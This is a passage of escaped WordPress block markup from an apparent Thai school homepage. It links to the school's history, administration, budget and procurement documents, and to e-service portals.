{\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\\u003cbr\\u003eรองผู้อำนวยการโรงเรียน\",\"link\":\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=share_link\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1QO7vaeEKkhB3kDmvrrIdBi3qQkJ8oya1/view?usp=sharing\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1j7kEi4hP1hbBIpZn7oJTgY-nHJ1PJQLs/view?usp=drive_link\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180gGIRpJLJ6MXT59TBBckEoyMyJ0syro/view?usp=drive_link\">กรรมการสถานศึกษา</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1WayPS34cjiQafz8cVXMrSwi14axv8wNL/view?usp=sharing\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1KNY_0cfvU0tSAr568ZHSWspTl7t86-R6/view?usp=sharing\" data-type=\"page\" data-id=\"19\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1aH-777mmqYYRu0vbttHBA-BPqFi1gHG0/view?usp=sharing\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/186unqENq5e2LLT2RUUIKpNMW3wPkg8bA/view?usp=drive_link\">ข้อมูล O-NET</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_0109ca-f6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_0109ca-f6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://eita.ssk.in.th/eit_admin.php\" data-type=\"link\" data-id=\"http://eita.ssk.in.th/eit_admin.php\">แบบวัดการรับรู้ EIT (2</a>)</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_b4c32e-bd\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_b4c32e-bd\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><img class=\"wp-image-200\" style=\"width: 150px;\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/EIT_QRCode-1.png\" alt=\"\"></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n\n<!-- wp:group {\"layout\":{\"type\":\"flex\",\"orientation\":\"vertical\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/container {\"uniqueId\":\"af4cbf6d\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:group {\"style\":{\"layout\":{\"selfStretch\":\"fill\",\"flexSize\":null}},\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"5869148e\",\"mediaId\":260,\"sizeSlug\":\"full\",\"alignment\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-5869148e\"><img class=\"gb-image gb-image-5869148e\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/08/O27.jpg\" alt=\"\" title=\"O27\"/></figure>\n<!-- /wp:generateblocks/image --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-XnhO6nbJXnq5lTaEGZNbfzXcc2abX8i/view?usp=sharing\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1XJHSkYkyNrh6WeKkxZXZgQVm1OH-SOIU/view?usp=sharing\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://watprato.ssk.in.th/\" data-type=\"page\" data-id=\"19\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><code><a href=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\" data-type=\"link\" data-id=\"https://padlet.com/outansama/q-a-aq3i9qiljbyghzrp\">Q&amp;A</a></code></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1ZP0lY1uWV2IQ20oOS1Vb_P11dTUVoRrK/view?usp=share_link\">แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1jcFEb7V7RyyJRJiifwLsot_owtQZm0jQ/view?usp=share_link\">แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1zOAtSlVojBUD4ujmbLIZr1UPsrfdO8KF/view?usp=sharing\">รายงานผลการดำเนินงานประจำปี</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1C-rHHkdFY6W_lIaFzNhz8EplezlByrq8/view?usp=share_link\">คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</a></strong><br> <a href=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1_WPqMYyMm_idddDd0MMPPRVoeY0erzfv/view?usp=share_link\">    - คู่มือฝ่ายบริหารงานงบประมาณ</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\"> - คู่มือฝ่ายบริหารงานวิชาการ</a><br> <a href=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1qKTCUzkpxq5KGBSV23JUe989WP112FZv/view?usp=share_link\">- คู่มือฝ่ายบริหารงานบุคคล</a><br> <a href=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1Yc2urlerL9tR2qJvXTJwhyft6kc-jJbp/view?usp=share_link\">  </a><a href=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/14pibk03Y3KVvKw1bp6bOYJB0RjcxVkC2/view?usp=share_link\">- คู่มือฝ่ายบริหารงานทั่วไป</a></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1-OZPPPgJKdC5RSTDhXsRdO0cG30ZFa3f/view?usp=share_link\">คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1UhXuS7Ye-9Gj0ft2Bc1psmWIuxTGlNlp/view?usp=drive_link\">ข้อมูลเชิงสถิติการให้บริการ</a></strong></td></tr><tr><td><strong><a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">E-Service</a></strong><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">สถิติการมาเรียน </a><br>      -  <a href=\"http://pp51pro.com:8077/?uri=anubanwatprato\" data-type=\"link\" data-id=\"http://pp51pro.com:8077/?uri=anubanwatprato\">ตรวจสอบผลการเรียน</a><br>      -  <a href=\"https://www.obec.go.th\" data-type=\"link\" data-id=\"https://www.obec.go.th\">OBEC</a><br>      -  <a href=\"http://contentcenter.obec.go.th\" data-type=\"link\" data-id=\"http://contentcenter.obec.go.th\">OBEC Content Center</a><br>      -  <a href=\"https://a6702.obec.expert/authen/login\" data-type=\"link\" data-id=\"https://a6702.obec.expert/authen/login\">School MIS</a><br>      -  <a href=\"https://portal.bopp-obec.info/obec67\" data-type=\"link\" data-id=\"https://portal.bopp-obec.info/obec67\">ข้อมูลนักเรียนรายบุคคล (DMC)</a></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1eZ8jUOmKGA2v5sew4XUxKnNotCVv2VZl/view?usp=share_link\">ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1HgGDEc5Rx8qn95aySOUn58ERju9XxhA4/view?usp=share_link\">ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</a></strong></td></tr><tr><td><strong><a href=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/180MlcaEcTik57qxA3DicKIZ8yN5Bs9Ag/view?usp=share_link\">ร</a><a href=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\" data-type=\"link\" data-id=\"https://drive.google.com/file/d/1iNx6GzzU16YF1hChm0Wpd48vl4RjwLvq/view?usp=share_link\">ายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 